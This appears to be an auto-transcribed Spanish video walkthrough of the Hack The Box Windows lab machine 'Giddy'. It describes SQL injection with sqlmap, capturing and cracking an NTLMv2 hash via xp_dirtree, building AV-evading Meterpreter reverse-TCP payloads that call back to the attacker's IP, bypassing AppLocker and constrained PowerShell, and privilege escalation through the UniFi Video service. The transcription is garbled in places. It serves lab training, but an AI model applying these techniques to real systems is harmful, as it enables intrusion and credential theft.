qué tal ingenieros su amigo plaintex de ese lado en esta ocasión vamos a ver la máquina de hack de box es una máquina basada en windows que nos permitirá discutir a diferentes temas entre ellos veremos el power shell web es algo que no habíamos visto trabajaremos con sql injection no encontraremos nada a nivel de la base de datos pero si vamos a poder aprovechar el equipe de 3 para nosotros poder extraer todo lo relacionado al entidad en versión 2 y hacer poder poder hacer el cracking de la máquina eventualmente vamos a tener acceso limitado a como usuario y vamos a escapar del power shell constrain mode al power shell full language para nosotros poder poder seguir el proceso de numeración y finalmente la parte de escalación de privilegios nos va a permitir encontrar una aplicación vulnerable que es interesante porque nos tenemos ciertas limitaciones pero igual vamos a poder salir adelante con algunas cuantas ideas que les voy a mostrar a medida que vayamos avanzando en el vídeo de cuál fue el proceso de pensamiento mientras estuve haciendo la máquina así que empecemos vamos a ver acá bien la máquina que vamos a trabajar guiri está en la 10 10 104 vamos a correr en map la psc para los script y for sv para verbose la ip de guiri es la 10 10 104 y vamos a mandar eso a en map punto tcp ya tengo esto listo así que vamos a ver el output de en map y tenemos en map nos dice que tenemos el puerto 80 abierto y está utilizando microsoft y es versión 10 también tenemos el puerto 443 tiene aquí un ssl htps y dentro de https pues nos dice que el common name es power chet power chel web access des website ya esto aquí es parte de un información que nos va a servir para nosotros poder saber más o menos a qué nos vamos a enfrentar y esto vamos a hablar en un segundo luego tenemos a el puerto 3389 abierto para acá para parte rdp y tenemos el puerto 59 85 bien entonces vamos a irnos directamente a ver qué tiene la página web 10 10 10 104 y aquí tenemos un perrito regularmente que quien el creador de la máquina máquina que es joaquín es joaquín noguera es un amigo del cual por ejemplo los vídeos que hice de la serie de joaquín él fue el creador siempre las máquinas de él nunca van a ser el tipo cactus de flag como que no puedes encontrar nada él siempre se enfoca en hacer máquinas muy similares a la vida real por eso siempre me gusta cada vez que tengo la oportunidad de ser una de las máquinas de él tienden a ser interesantes y cosas nuevas tiendo a aprender siempre así que denle una miradita a su profile en twitter síganlo es es una persona súper lista y que bueno gracias a dios es parte del grupo que tengo de amigos hago mención de esto porque también es bueno conocer ya cuáles son estos creadores de hack de voz que tienden a hacer entonces en el caso de joaquín él siempre se va por cosas no tan tradicionales a nivel de windows y por eso nos trae cosas súper interesantes así que no es por ejemplo yo no me enfocaría en mirar la imagen porque él no se va de que a poner metadata en imágenes salvo a se puede hacer algo que se pueda utilizar en la vida real entonces no le voy a hacer caso directamente a la imagen sino que vamos a a por el go booster vamos a usar el word list you searcher word list de buster director y list 2 small y vamos entonces a apuntar a la url 10 10 10 104 y le vamos a decir que lo haga 50 para hacerlo un poquito más rápido bien esto regularmente va a tomarse unos minutos lo que vamos a encontrar bueno aquí ya encontramos el primer sitio es remote vamos a entrar y aquí nos manda para el sitio windows power shell web access aquí nos dice simplemente que el protocolo no es seguro y que requiere conexión https pero como ya revisamos también tenemos disponible https agregamos la excepción y aquí tenemos acceso al power shell a web access a inmediatamente vi esto pues estuve buscando qué es windows power shell web access porque honestamente nunca lo había visto vi entonces cómo instalarlo incluso inmediatamente vi cómo instalarlo el power shell web access viene por defecto en otro directorio que no es el que él está usando en esta ocasión y entonces ahí simplemente me identifique las cosas que se pudieran hacer en power shell web access como pueden ver simplemente este sería una consola que el usuario tendría para trabajar en una máquina de windows es un shell de windows para poder pues hacer cualquier cosa entonces el otro sería este en bici vamos a entrar al 10 10 10 104 en bici voy a cancelar el go buster no voy a necesitar encontrar más nada en el caso pues ustedes siempre lo termina pero con estos dos directorios que encontramos el remote y el mbc me es suficiente para nosotros poder avanzar en la máquina simplemente para que no me haga ruido en el background aquí tenemos una página tradicional dice que es 2019 tenemos un home y demás bueno cuando entró a una página ya sea que vaya a correr un análisis de vulnerabilidad automático pues lo dejo corriendo en background y simplemente empiezo a probar aquí tiene una parte de registro el login que funcionan y aquí tienen un tema de productos si se fijan aquí el producto me está dando el aire de información si le ponemos un quote es simplemente podemos confirmar que esto es vulnerable a ese cual la inyección así de sencillo si por ejemplo le ponemos el comentario al final aún sigue con el dicho bueno esto es lo está haciendo a nivel de string esto con esto confirmamos que es vulnerable o sea ya aquí yo le pongo una sola un hyphen solamente le pongo uno y me da un error si le pongo dos que a nivel de sql significa comentario pues simplemente ya confirmó que puedo reparar el query y hacer ese cual inyección si quieren tener un poquito más detalles de información de sql inyección les invito a que vean el vídeo de boom hub este vídeo es uno de boom hub mayés my sql y cross a scripting ese vídeo explicó muy detalladamente todo lo relacionado a ese cual inyección a nivel general básico sin embargo lo que vamos a hacer hoy en este vídeo no lo explico sql map vamos a utilizar en sql map ustedes le pueden especificar la url en este caso es http le ponemos la url le decimos que el nivel va a ser 5 y el riesgo va a ser 3 esto obviamente porque no nos importa pero ya en un ambiente de producción eso sería manejar lo diferente o pedirle a la compañía que nos dé una página de prueba y luego tenemos vamos a decirle que nos dé las bases de datos de ese equipo decimos que no cancelar corremos y le decimos que no dice que encontró que es microsoft sql server y aparentemente aquí el producto es inyectable entonces ya y él va a empezar a hacer las pruebas y demás hasta que pues nos tragan la información de la de la base de datos regularmente lo va a hacer rápido entonces qué van a hacer cuando tienen sql inyección pues lo típico en el caso de mío pues corro sql map y veo si puedo extraer toda la información simplemente usando sql map antes de irme a la parte manual que no necesariamente no siempre va a ser necesario y aquí hay unas cinco bases de datos estas bases de datos son las que trae por el efecto sql sean de momento no nos interesa salvo master que pudiéramos utilizar para diferentes configuraciones pero vamos a ver que tiene inyección borro la parte de debe y le pongo le especificó la de mayúscula no lo están viendo acá aunque y sobre ahora sí le especificó la de mayúscula y le pongo el nombre de la base de datos en este caso la base de datos se llama inyección luego lo va a decir que muestre las tablas vamos a utilizar tres para hacerlo más rápido 10 entonces estas son las las tablas tiene productos no hay más tablas bueno quizá no me aparece la tabla de users porque cuando yo lo estuve haciendo si me apareció es porque no me ha registrado vamos a hacer la prueba test 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 password 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 registrar no grabe ok vamos a intentarlo ahora y tampoco aparece que extraño inyección tables esto estoy casi 100% seguro que esto puede ser que me esté trabajando me esté trayendo el caching y no exactamente lo que yo quiero como puedo quitarle el caching a nivel de sql map bueno grab cache el hh en si en sql map pues cache no no veo nada de cache temp algo que tenga que ver con temporal mhm aquí veo algo de pulp vamos a intentar eso bueno es simplemente lo que estaba borrando todo lo que yo tenía en la base en el directorio de emma eso es porque me parece que debería aparecer una parte donde diga users simplemente es pura curiosidad mientras tanto vamos a ir buscando en la sql map ah no perdón sql inyección ehh de 3 esto ya yo lo había utilizado anteriormente ehh incluso estuve haciendo un pentesting y y me encontré osea tuve la necesidad de utilizarlo ehh y es bastante útil ehh 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 que esta corriendo el tema de el motor de sql oque mirélo acá si sabía que estaba habían otros elementos entonces aquí tengo el elemento user simplemente me estaba mostrando el caching entonces simplemente le hice un puch sea borre todo debe haber otro comando que no sea necesariamente ese me parece que sí que hay otro, pero bueno, no vamos a perder tiempo en esto, lo que pueden ver es que no tengo acá como nada, simplemente el user que van a encontrar es el user que yo acabo de crear, o sea que de momento no tenemos la forma de nosotros utilizar SQL Injection para quizá autenticarnos, porque ni siquiera tiene usuarios, solamente tiene el usuario que nosotros creamos, entonces vamos a intentar usar el OS Shell déjenme ponérselo aquí arriba, sorry vamos a usar el OS Shell y el OS Shell simplemente va a intentar darnos un Shell utilizando XPSM de Shell lo va a intentar habilitar, y aquí vamos a tener el problema, simplemente lo intenté hacer manual, igual tuve el mismo problema, y entonces por eso fue que me terminé irme por la parte del Dirtree vamos a ver si está aquí ok, esto es lo que vamos a hacer, incluso esto es súper útil porque ustedes pueden, la inyección o sea, esto lo pueden pasar a nivel de DNS o a nivel de SMB, yo cuando lo usé, lo usé a nivel de SMB, y es súper interesante vamos a ver cómo funciona, lo que vamos a hacer es que vamos a declarar esta variable acá, hasta aquí vamos a usar ok, vamos a darle a enter acá aquí estaría este, acá el producto sería acá para que tengan una idea de dónde estaremos trabajando entonces vamos a declarar un Vouchard, no tiene que ser tan grande vamos a ponerlo de 100 ok, y vamos entonces a borrar esto aquí le vamos a poner 10, 10, 15, 2, 48 y luego le vamos a decir puede ser así mismo text.txt le damos a execute, marter, do tree ok vamos a declarar una variable que se llama Q que contenga hasta 100 esto puede ser 50, 20 no creo que tenga ahí 20 caracteres vamos a ponerle 50 luego vamos a ponerle el valor de un shell ford en nuestro equipo lo que vamos a hacer es que vamos a utilizar in packet SMB server share lo que comúnmente ustedes me ven utilizando para compartir archivos en Windows luego que hagamos esto entonces vamos a usar execute, master, equipedio tree esto simplemente lo que va a intentar es conectarse a nuestro directorio y cuando tenemos una conexión a nuestro directorio pues simplemente vamos a tener el mtlm hash el mtlm hash, bueno, podemos crackearlo este sería nuestro comando vamos a copiarlo ejecutamos y aquí tengo la autenticación de el servicio o sea, el usuario que está corriendo el servicio de SQL si se pueden ver aquí está Stacy que sería el nombre del usuario y Giddy que sería el nombre de la máquina vamos a copiar esta parte acá ok, bueno, tuve que parar el video porque cuando hice el cambio a mi host de Windows que es donde ejecuto comúnmente el tema de hashcard pues falló la pantalla no se estaba mirando entonces lo que voy a hacer es que voy a copiar copiar aquí el hash para entonces crackearlo directamente desde la Kali grabamos este archivo en Giddy como Giddy hash y entonces venimos aquí ejecutamos hashcard el módulo 5600 si por ejemplo hacemos un help ntlm aquí nos dice que el net ntlm es 5600 sería el módulo que usaríamos hashcard m5600 Giddy hash y luego le vamos a decir el wordless que sería user share wordless rockkey me parece que tengo que poner force comúnmente esto en Kali se va a tomar más tiempo obviamente porque lo estoy haciendo en mi máquina virtual si lo estuviera haciendo directamente en mi host de Windows pues sería un poquito más rápido pero vamos a esperar bueno, aquí dice el cracking y este sería el password de Giddy aquí está el password sería nombre de la máquina Giddy Stacy y aquí el el password bien Stacy que molesto fue esa esa parte así que les pido disculpas password aquí está y computer name es Giddy vamos a hacer un sign in y listo ya tenemos acceso vamos a poner eso un poquito más grande para que lo puedan ver y lo voy a mover hacia acá para que no interrumpa la cámara ok vamos a dar dir para ver que tenemos acá summit aquí está un nombre de un archivo ese archivo es clave para la parte de escalación de privilegios sin embargo antes de entrar a la parte de escalación de privilegios vamos a ver si podemos tener una shell vamos a ver who am I brief no tenemos muchos privilegios dice que somos Giddy Stacy ok a nivel de metexploit vamos a correr el msf console bueno no lo voy a correr vamos a buscar bueno msbenom payload windows metter preter reverse tcp el host 10 10 15 248 el port 443 el file va a ser output sería exploit o pongámosles payload .exit simplemente vamos a intentar ejecutar metexploit en la máquina a ver que sucede vamos a correr el msbenom console perdón con la x le definimos el use multi handle set payload el payload nuestro parece que está durando bastante set el host 10 10 15 es 48 set el port 443 set set exit on session false y le decimos exploit j para que lo ponga a correr en el background me parece que se ha tomado mucho tiempo vamos a cancelarlo vamos a remover el archivo payload y vamos a ejecutarlo otra vez comúnmente metexploit no va a durar tanto así que vamos a vamos a ver ok ya está listo y lo sería correr in packet smb server share para intentar ejecutarlo directamente desde acá lo ponemos 10 10 15 248 share payload punto exit listo aquí se conectó vamos a ver si tenemos el shell dice que está running pero dice que está bloqueado por group policy que contacte el administrador del sistema bien entonces vamos a ver que clase de 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 políticas está ahora mismo implementando el sistema vamos a poder regularmente cuando no pueden ejecutar payload perdón a cualquier tipo de archivo directamente a una máquina tiende a ser políticas de bloqueo entonces vamos a importar por módulo a bloqueo y entonces vamos a declarar una variable de musil get a lo que a policy efectivo y entonces en esta vamos a hacer un rule collections simplemente esto nos debería mostrar perdón creo que lo escribí mal nos debería mostrar todas las políticas de app blocker como la podemos ver acá aparentemente hay pocas pueden ser las default aquí tenemos default rule todos los paquetes vamos a decir signet o sea que ya pues está comprobado en el caso de nuestro archivo de metasploit no está signet tenemos program file todos los archivos ubicados en program file es interesante si podemos copiar un archivo en program file pues simplemente tendríamos ejecución windirector all file located in windows también podemos ejecutarlo esta ya con esta simplemente se me encendió el bombillito vamos a buscar el app blocker app blocker bypass checker esto es un script que he utilizado anteriormente no fue este que utilicé creo que fue este pero ambas funcionan esto lo que va a hacer es que va a buscar users o sea todos los que sean users si tienen acceso de escritura en la carpeta de windows en que carpetas dentro de la carpeta windows tienen acceso de escritura lo pueden ver vamos a copiar esto acá a nuestro shell y lo ejecutamos ahí lo va a empezar a buscar folder por folder dentro del directorio de windows a cuáles nosotros tenemos acceso de escritura aquí ya terminó entonces simplemente esto nos dice que tenemos acceso de escritura y lectura en estos directorios vamos entonces a intentar copiar exacto vamos a movernos a windows task aquí no hay nada lo vamos a copiar 10 10 15 248 share payload punto exit vamos a copiar aquí aquí lo tenemos entonces ejecutemos payload punto exit y vamos que pasa entonces aquí nos dice que hay un virus o sea que no vamos a poder ejecutar archivos con virus la máquina está protegida con antivirus para utilizar metexploit y hacerle bypass antivirus comúnmente utilizo astrobaby metexploit creo que es el nombre es astrobaby pero es para mimikatz en windows 10 algo así que él simplemente hizo una variación del payload de metexploit que es esta que ustedes ven acá y con esto nosotros vamos a poder hacer un bypass vamos a crear un archivo que se llame metexploit payload punto sh y vamos a copiar el contenido de él de lo que extraímos de su página que es esta parte que ustedes ven acá esto es lo que nos va a ayudar a nosotros generar nuestro payload lo guardamos listo y luego entonces podemos copiar este si queremos también eso es simplemente lo que nos va a generar es el listener aunque el listener yo lo tengo o sea que no me interesaría generarlo con esto aunque la única diferencia es que le está generando uno de 64 bits eso sí tendría que cambiarlo vamos a hacerlo aquí tenemos jobs vamos a eliminar el job que tenemos corriendo y vamos a decir que el payload sería windows x64 interpreter reverse tcp vemos las opciones todo bien y entonces ahora sí lo tenemos ejecutando de manera correcta ok vamos entonces a darle privilegio de ejecución a este metexploit payload y vamos a ejecutarlo lo primero que nos pide es nuestra dirección IP le pasamos nuestra dirección IP y el número de puerto 443 y él va a crear un archivo que se llama payload.exit y ese es el archivo que vamos a intentar copiar vamos a ver si windows lo borró si lo borró pero vamos a hacer lo mismo 101015248 share payload.exit copiamos ahí está payload.exit lo ejecutamos y como pueden ver ahora sí estamos recibiendo le está mandando el stager me resulta un poco extraño que que no terminara de mandarlo vamos a ejecutarlo otra vez así lo borró no payload o quizás no le guste el nombre del payload vamos a ponerle move move payload.exit y le vamos a poner salsa mi amigo Luis que le gusta tanto la salsa vamos a ejecutar salsa.exit y salsa funciona excelente entonces si salsa nos funcionó simplemente con el archivo payload con el nombre payload puede ser simplemente que yo lo ejecutara otra vez el caso es que ya tenemos una sesión de metérpreter vamos a entrar a la sesión de metérpreter y recuerden que lo que queríamos hacer era hacer un bypass al modo constraint incluso si esto se queda ejecutando bueno lo voy a hacer desde aquí si yo entro al shell y pongo powershell execute bypass y pongo por ejemplo acá aquí tendría los mismos privilegios fíjense no estamos hablando que yo he hecho alguna escalación de privilegios pero en este powershell si yo ejecuto execution execution context me parece session state language mode exacto aquí dice que tenemos estamos en el modo constraint en el modo constraint no vamos a poder ejecutar ciertas cosas por ejemplo si yo intento hacer un download ejecutar por ejemplo powersploit power up para uno hacer verificación de hacer verificaciones no voy a poder hacerlo entonces lo que yo hice fue que utilicé el load powershell y entonces aquí si usamos powershell execute no powershell shell vamos a copiar esto para concluir la máquina no es necesario esto simplemente se lo quise mostrar en el caso que ustedes se preguntaran como pueden hacer asunto escalación de privilegio cuando yo estuve haciendo la máquina lo hice porque no fui directamente a verificar el union el unify video corri mi power up y luego entonces vi esa parte entonces simplemente esto lo que nos va a permitir a nosotros es ejecutar cualquier comando on the powershell vamos a salir lo que voy a hacer es voy a utilizar power up power up github yo lo tengo aquí en mi máquina simplemente ustedes lo pueden buscar que es el que nosotros utilizamos para el tema de escalación de privilegio el privilegio el power up ps1 ok vamos a buscarlo acá en mi máquina locate power up punto ps1 bueno yo sé dónde está vamos a usar en powershell import up windows power up punto ps1 y dice que no lo encontró o sea que no sé dónde está prevés windows creo que por el nombre que es está en mayúscula power up ps1 ahora sí entonces le decimos power shell ejecutamos el shell y le decimos invoke all checks este es uno de los módulos de power up que simplemente nos va a ayudar a nosotros a hacer cualquier tema de escalación de privilegios como pueden ver algunas cuantas cosas no tenemos acceso con la máquina y por eso da algunos errores por eso lo complico un poquito esto sí me reí bastante cuando vi esto vamos a copiarlo para que lo veamos en un segundito bien entonces esto es uno de los scripts que yo corro comúnmente para asuntos de escalación de privilegios a nivel de windows ahí me va a decir muchas cosas que hacerlo o de manera manual puede costar un poquito más bien mientras esto verifica cuando entramos acá recuérdense que lo primero que vimos en en la pantalla fue esto unify video si buscamos unify video en internet vemos que es una aplicación si le ponemos a esto al lado exploit o vulnerability pues nos va a salir esto local privilege escalation y aquí vamos a leer un poquito a ver de de que se trata esta escalación de privilegios nos dice las versiones que fueron afectadas 3.7 3 y 3.2 básicamente vamos a encontrar este servicio ejecutándose dentro de nuestro nuestra máquina y aquí terminó no encontró nada vamos a salir de aquí vamos a ver los servicios a ver si ese servicio que nos mencionó está corriendo acá el servicio es vamos a buscarlo este aves aquí está aveservice está ejecutándose bien entonces nos dice que es instalada en el directorio program data unify video por defecto en el servicio llamado ubiquity unify video el ejecutable se llama aveservices y corre con los privilegios de enti authority entonces nos dice sin embargo los permisos por defectos en la carpeta program data unify video son heredados de program data y que no son explícitamente overriding sobre escritos esto permite a todos los usuarios aunque no tengan privilegios que puedan escribir dentro del directorio de la aplicación si por ejemplo ejecutamos esto vamos a poder validarlo bueno aquí tengo que irme a program data dir entonces si simplemente nos dice que users tiene privilegios de escritura bien entonces dice cuando se inicia y se detiene el servicio el trata de cargar un archivo en el path program data unify video task skill sin embargo este archivo no existe por defecto vamos a ver unify video dir y no no está aquí entonces si podemos copiar un archivo con el nombre task skill a este directorio y reiniciarlo pues vamos a poder escalar de privilegios excelente vamos a hacer esa parte entonces vamos a copiar nuestra salsa sería windows task skill salsa punto exit y le vamos a poner por nombre task kill punto exit si lo copiamos bien entonces lo otro que tendríamos que hacer es reiniciar el servicio para reiniciar el servicio podemos usar netstat perdón netstar ok tenemos acceso denegado o sea que no vamos a poder ver los servicios de esa forma entonces que paso yo intenté verlo con powershell me parece ese get service y tampoco me dejaba no tengo acceso denegado o sea que necesitaríamos saber cuál es el nombre del servicio sin poder ver los nombres de servicios entonces lo que hice fue bueno primero ejecuté dentro de este directorio busqué service se usé el find string find string me parece que así es que el nombre si service creo que es todo lo que necesito ahí sería buscar de una manera recursiva todos los los archivos ah ok bueno ya me acuerdo otra cosa que hice sería find string si service y lo busqué en los archivos asterisco xml asterisco txt asterisco conf así y que otro más creo que fueron esos tres bien ahí no no encontré nada bueno me cambié de directorio program data unify video bien este archivo simplemente lo que nos dice que nosotros vamos a buscar dentro de esos tipos de archivos es en el nombre service aquí nos da conf server xml service catalina probé este a nivel de para utilizar power shell podemos usar stop service el nombre del servicio catalina y nos dice que no se puede encontrar un servicio con el nombre de catalina bien lo próximo que hice fue irme al directorio raíz y dije bueno vamos a buscarlo no lo voy a ejecutar en el directorio raíz pero cuando lo hice sí vamos a ejecutarlo en el directorio de users stacy y entonces aquí sí nos da la información entonces dice que tenemos console host history net stop unify video service stop service name unify video service y tenemos el unify video service name en varias partes entonces vamos a hacerlo así power shell vamos a copiar esto mismo así como está acá ups y eso nos debería dar un shell recuerden que ok ahí viene bien recuerden que el exploit decía cuando tú intentas parar o encender el servicio él te va a decir va a ejecutar el task kill ahí lo ejecutó vamos a cancelar esto vamos sessions y tenemos nuestra sesión como anti authority system estamos users administrator desktop y ahí tenemos nuestro querido root punto txt así que esto ha sido todo espero que les haya gustado disculpen por la parte de la edición pues simplemente salió mal nada chicos nos vemos en la próxima de la próxima